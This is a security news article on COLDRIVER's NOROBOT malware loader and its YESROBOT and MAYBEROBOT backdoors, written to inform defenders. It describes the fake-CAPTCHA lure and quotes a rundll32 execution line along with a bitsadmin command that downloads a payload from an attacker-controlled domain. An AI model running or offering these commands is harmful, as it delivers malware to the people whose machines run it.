New LOSTKEYS Malware Linked to Russia State-Sponsored Hacker Group COLDRIVER

Over the summer of 2025, a novel malware family emerged following the public disclosure of the LOSTKEYS implant.

This new strain was rapidly weaponized in a series of highly targeted campaigns against policy advisors, non-governmental organizations, and dissidents.

Leveraging a refreshed lure known as COLDCOPY ClickFix, threat actors masqueraded the payload as a CAPTCHA verification to dupe users into executing a malicious DLL via rundll32.

Early samples demonstrated an aggressive development tempo marked by multiple iterations of the downloader component and backdoor stages.

Google Cloud analysts noted that the loader, dubbed NOROBOT, began deployment within days after LOSTKEYS was profiled.

Unlike its predecessor— which relied on a multi-stage PowerShell approach—NOROBOT invoked rundll32 iamnotarobot.dll,humanCheck to bootstrap the infection chain.

Subsequent stages fetched partial cryptography keys and complementary payloads from attacker-controlled infrastructure, recombining components to decrypt and install a Python backdoor, YESROBOT.

Initial operations saw YESROBOT deployed briefly in late May before being quickly replaced by a streamlined PowerShell backdoor, MAYBEROBOT.

This change addressed the detection noise created by a bundled Python interpreter and enabled more flexible command execution without requiring a full interpreter runtime.

Both backdoors maintained minimal built-in functions, relying on the operator to supply complex commands over HTTPS to a hardcoded command-and-control server.

Within months, the malware reached its third major iteration, exhibiting not only simplified delivery but also rotating infrastructure and file naming conventions to evade network defenders.

Malware development overview illustrates this evolution, from the initial complex downloader to the condensed logon script mechanism.

COLDCOPY attempting to lure the user to execute NOROBOT highlights the social engineering employed to trick targets into executing a seemingly innocuous DLL.

Infection Mechanism

The infection begins when a user visits a compromised page posing as a custom CAPTCHA. The page prompts execution of iamnotarobot.dll, invoking the humanCheck export.

Once loaded, NOROBOT retrieves encrypted payload fragments via bitsadmin:-

bitsadmin /transfer downloadJob /download /priority normal https://inspectguarantee.org/libsystemhealthcheck.py %APPDATA%libsystemhealthcheck.py

Next, the loader writes part of the AES key to the registry and schedules a task to assemble and decrypt the final payload.

This staged approach forces defenders to collect multiple artifacts—downloads, registry entries, scheduled tasks—to reconstruct the complete chain.

By splitting cryptographic keys and alternating downloader complexity, COLDRIVER maintains operational security while exacting intelligence collection from high-value targets.

Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.